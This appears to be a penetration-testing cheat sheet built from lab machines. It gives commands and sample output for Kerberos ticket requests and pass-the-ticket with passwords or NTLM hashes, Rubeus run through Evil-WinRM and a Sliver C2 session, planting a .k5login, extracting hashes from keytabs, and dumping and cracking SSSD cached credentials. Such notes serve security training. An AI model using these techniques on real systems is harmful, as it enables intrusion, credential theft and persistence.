Authentication Method
Kerberos Ticket
1. Configure /etc/hosts
# Always in this order - DC.example.com example.com DC
sudo nxc smb <DC_IP> --generate-hosts-file /etc/hosts
Sample Output:
$ sudo nxc smb 10.129.235.149 --generate-hosts-file /etc/hosts
SMB 10.129.235.149 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
$ tail -n1 /etc/hosts
10.129.235.149 DC.administrator.htb administrator.htb DC
2. Configure /etc/krb5.conf
# The realm is always in UPPERCASE (EXAMPLE.COM for DC.example.com; compare default_realm in the generated file below)
sudo nxc smb <DC_IP> --generate-krb5-file /etc/krb5.conf
Sample Output:
$ sudo nxc smb 10.129.235.149 --generate-krb5-file /etc/krb5.conf
SMB 10.129.235.149 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
$ cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = ADMINISTRATOR.HTB
[realms]
ADMINISTRATOR.HTB = {
kdc = dc.administrator.htb
admin_server = dc.administrator.htb
default_domain = administrator.htb
}
[domain_realm]
.administrator.htb = ADMINISTRATOR.HTB
administrator.htb = ADMINISTRATOR.HTB
3. Request a Ticket
# Password
# ntpdate syncs the local clock with the DC first: Kerberos rejects requests
# whose timestamp falls outside the KDC's permitted clock skew.
# NOTE: a password given on the command line is stored in shell history and is
# visible to other local users via `ps`; leaving ':<PASSWORD>' off the target
# string makes getTGT prompt for it instead.
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
$ sudo ntpdate -s 10.129.255.235 && impacket-getTGT 'ADMINISTRATOR.HTB/Olivia:ichliebedich' -dc-ip 10.129.255.235
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Olivia.ccache
# NTLM
# -hashes takes LMHASH:NTHASH; the leading ':' leaves the LM half empty and
# passes only the NT hash (see the sample below). ntpdate as above: Kerberos
# is clock-skew sensitive.
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP>
Sample Output:
$ sudo ntpdate -s 10.129.255.235 && impacket-getTGT 'ADMINISTRATOR.HTB/Olivia' -hashes :fbaa3e2294376dc0f5aeb6b41ffa52b7 -dc-ip 10.129.255.235
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Olivia.ccache
4. Pass The Ticket
# Relative path: the cache is resolved against the current working directory
# (klist below reports FILE:<USER>.ccache), so run the Kerberos-aware tools
# from the directory holding the .ccache, or export an absolute path instead.
export KRB5CCNAME='<USER>.ccache'
Sample Output:
$ export KRB5CCNAME='Olivia.ccache'
5. Check
klist
Sample Output:
$ klist
Ticket cache: FILE:Olivia.ccache
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-16T20:54:29 2025-07-17T06:54:29 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-17T20:54:29
3. Installation [Optional]
sudo apt install krb5-user cifs-utils
Sample Output:
TO-DO
4. Request a Ticket
sudo ntpdate -s <DC_IP> && kinit <USER>
Sample Output:
$ sudo ntpdate -s 10.129.234.139 && kinit Olivia
Password for Olivia@ADMINISTRATOR.HTB:
# Check
klist
Sample Output:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-15T05:02:44 2025-07-15T15:02:44 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-16T05:02:37
ktutil
Sample Output:
$ ktutil
ktutil:
# Domain in UPPER case
add_entry -key -p <USER>@<DOMAIN> -k 1 -e rc4-hmac
Sample Output:
ktutil: add_entry -key -p Olivia@ADMINISTRATOR.HTB -k 1 -e rc4-hmac
Key for Olivia@ADMINISTRATOR.HTB (hex):
# NTLM
<HASH>
Sample Output:
Key for Olivia@ADMINISTRATOR.HTB (hex): fbaa3e2294376dc0f5aeb6b41ffa52b7
ktutil:
write_kt <USER>.keytab
Sample Output:
ktutil: write_kt Olivia.keytab
ktutil:
exit
Sample Output:
ktutil: exit
kinit -V -k -t '<USER>.keytab' -f '<USER>@<DOMAIN>'
Sample Output:
$ kinit -V -k -t 'Olivia.keytab' -f 'Olivia@ADMINISTRATOR.HTB'
Using default cache: /tmp/krb5cc_1000
Using principal: Olivia@ADMINISTRATOR.HTB
Using keytab: Olivia.keytab
Authenticated to Kerberos v5
# Check
klist
Sample Output:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-15T05:02:44 2025-07-15T15:02:44 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-16T05:02:37
1. Request a Ticket
# Password
.\rubeus.exe asktgt /user:<USER> /password:'<PASSWORD>' /enctype:<ENC_TYPE> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\programdata> .\rubeus.exe asktgt /user:m.lovegod /password:'AbsoluteLDAP2022!' /enctype:AES256 /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\m.lovegod'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : m.lovegod
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:08:14 AM
EndTime : 9/24/2024 11:08:14 AM
RenewTill : 9/24/2024 11:08:14 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : aes256_cts_hmac_sha1
Base64(key) : u2ScGZUzmFdmTGETruj0VhWSGwiKTg7dbQVabz0QZU8=
ASREP (key) : 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
# NTLM
.\rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\programdata> .\rubeus.exe asktgt /user:Administrator /rc4:1f4a6093623653f6488d5aa24c75f2ea /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 1f4a6093623653f6488d5aa24c75f2ea
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\Administrator'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : Administrator
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:10:55 AM
EndTime : 9/24/2024 5:10:55 PM
RenewTill : 10/1/2024 7:10:55 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : Ge3n0tM7A0k4q2bJ+0F+uA==
ASREP (key) : 1F4A6093623653F6488D5AA24C75F2EA
2. Check
klist
Sample Output:
*Evil-WinRM* PS C:\programdata> klist
Current LogonId is 0:0x2e0e9d
Cached Tickets: (2)
#0> Client: Administrator @ ABSOLUTE.HTB
Server: krbtgt/ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 9/24/2024 7:10:55 (local)
End Time: 9/24/2024 17:10:55 (local)
Renew Time: 10/1/2024 7:10:55 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: Administrator @ ABSOLUTE.HTB
Server: HTTP/DC.ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 9/24/2024 7:05:19 (local)
End Time: 9/24/2024 17:03:25 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x8 -> ASC
Kdc Called:
1. Request a Ticket
# Password
rubeus -- 'asktgt /user:<USER> /password:<PASSWORD> /enctype:<ENC_TYPE> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap'
Sample Output:
sliver (helloworld) > rubeus -- 'asktgt /user:m.lovegod /password:AbsoluteLDAP2022! /enctype:AES256 /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap'
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using salt: ABSOLUTE.HTBm.lovegod
[*] Using aes256_cts_hmac_sha1 hash: 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\m.lovegod'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : m.lovegod (NT_PRINCIPAL)
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:16:52 AM
EndTime : 9/24/2024 11:16:52 AM
RenewTill : 9/24/2024 11:16:52 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : aes256_cts_hmac_sha1
Base64(key) : aBhZJr9iogDKSLtohxAgie5HPBSLktIxsRYujp/MqVA=
ASREP (key) : 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
# NTLM
rubeus -- 'asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap'
Sample Output:
sliver (helloworld) > rubeus -- 'asktgt /user:Administrator /rc4:1f4a6093623653f6488d5aa24c75f2ea /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap'
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 1f4a6093623653f6488d5aa24c75f2ea
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\Administrator'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : Administrator (NT_PRINCIPAL)
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:17:33 AM
EndTime : 9/24/2024 5:17:33 PM
RenewTill : 10/1/2024 7:17:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : BIdtxt2Rokdo+R9tNjoCLA==
ASREP (key) : 1F4A6093623653F6488D5AA24C75F2EA
2. Check
c2tc-klist
Sample Output:
sliver (helloworld) > c2tc-klist
[*] Successfully executed c2tc-klist (coff-loader)
[*] Got output:
Cached Tickets: (1)
#0> Client: Administrator @ ABSOLUTE.HTB
Server: krbtgt/ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: (18) AES256_CTS_HMAC_SHA1_96
Ticket Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 9/24/2024 7:17:33
End Time: 9/24/2024 17:17:33
Renew Time: 10/1/2024 7:17:33
Session Key Type: (23) RC4_HMAC_NT
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
WinRM with Kerberos
1. Configure /etc/krb5.conf
# In UPPERCASE
# Realm names (<DOMAIN>) are uppercase; hostnames (<DC>) keep their DNS case.
[libdefaults]
default_realm = <DOMAIN>
[realms]
<DOMAIN> = {
# 88 is the Kerberos KDC port.
kdc = <DC>:88
admin_server = <DC>
default_domain = <DOMAIN>
}
[domain_realm]
# Maps a DNS domain (with the leading '.', its subdomains too) to the realm.
# NOTE(review): the literal 'domain.internal' is kept verbatim in the sample
# below as well, whereas the nxc-generated file in the Kerberos Ticket section
# maps the real DNS domain (.administrator.htb = ADMINISTRATOR.HTB). The
# Connect sample still works, presumably because default_realm covers it, but
# the real DNS domain is the intended value here.
.domain.internal = <DOMAIN>
domain.internal = <DOMAIN>
Sample Output:
[libdefaults]
default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = DC.ABSOLUTE.HTB:88
admin_server = DC.ABSOLUTE.HTB
default_domain = ABSOLUTE.HTB
}
[domain_realm]
.domain.internal = ABSOLUTE.HTB
domain.internal = ABSOLUTE.HTB
2. Connect
# Ticket-based Kerberos
# Relies on the krb5.conf from step 1 and on a ticket already in the credential
# cache; -r is the (uppercase) realm. The sample passes the DC's FQDN as
# <TARGET>, which is the name the HTTP service ticket is issued for.
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output:
$ sudo ntpdate -s DC.ABSOLUTE.HTB && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
SMB with Kerberos
# Ticket-based Kerberos
# -k: authenticate with the ticket in the cache that KRB5CCNAME points to (no
# password is sent); -no-pass: do not prompt for one. Use the host's FQDN as
# <TARGET> (as in the sample), since the service ticket is requested for that
# name. ntpdate first, because Kerberos is clock-skew sensitive.
sudo ntpdate -s <DC_IP> && impacket-smbclient '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output:
$ sudo ntpdate -s DC.ABSOLUTE.HTB && impacket-smbclient 'ABSOLUTE.HTB/Administrator@DC.ABSOLUTE.HTB' -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
Type help for list of commands
#
Kerberos in Linux
Add Kerberos Access
# '>' replaces any existing .k5login, dropping principals already listed there.
# Defender note: a .k5login in a home directory grants the listed principals
# Kerberos login as that user, so unexpected ones are worth auditing.
echo '<USER>@<DOMAIN>' > /home/<TARGET_USER>/.k5login
Sample Output:
TO-DO
Extract NTLM from Keytab
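# Check
# Dumps the keytab as one base64 line (GNU base64; '-w0' disables line
# wrapping). base64 reads the file directly instead of through a cat pipe.
# /etc/krb5.keytab is normally readable only by root.
base64 -w0 /etc/krb5.keytab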
Sample Output:
TO-DO
# Extract
python3 keytabextract.py krb5.keytab
Sample Output:
$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : EXAMPLE.COM
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Ref: KeyTabExtract
SSSD Cached Credentials
# Config
cat /etc/sssd/sssd.conf
Sample Output:
bash-5.1# cat /etc/sssd/sssd.conf
[sssd]
domains = vigilant.vl
config_file_version = 2
services = nss, pam
[domain/vigilant.vl]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = VIGILANT.VL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%d/%u
ad_domain = vigilant.vl
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = simple
simple_allow_users = administrator
simple_allow_groups = Domain Users
override_homedir = /home/%d/%u
enumerate = true
ldap_search_timeout = 50
ldap_enumeration_search_timeout = 60
ldap_network_timeout = 60
# Get usernames and hashes
# The cache holds password hashes because sssd.conf above sets
# cache_credentials = True (and krb5_store_password_if_offline = True); the
# .ldb under /var/lib/sss/db is normally root-only (note the root prompt above).
# Mitigation: leave cache_credentials off on hosts that never need offline logins.
strings /var/lib/sss/db/cache_<DOMAIN>.ldb | grep -B 10 -A 10 cachedPassword | tee result.txt
Sample Output:
TO-DO
# Filter hashes
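# Keep only the crypt-style hash lines (those starting with '$') from the
# strings dump, one per unique hash. grep reads the file directly (no cat
# pipe) and 'sort -u' replaces 'sort | uniq'.
grep -E '^\$' result.txt | sort -u | tee hashes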
Sample Output:
TO-DO
# Crack hashes
# -m 1800 is sha512crypt ($6$), the crypt format the '$'-prefixed SSSD hashes
# filtered above are expected to be; -a 0 is a straight wordlist attack.
# --force suppresses hashcat's device/runtime warnings, so odd results should
# be rechecked without it.
hashcat -m 1800 -a 0 hashes /usr/share/wordlists/rockyou.txt --force
Sample Output:
TO-DO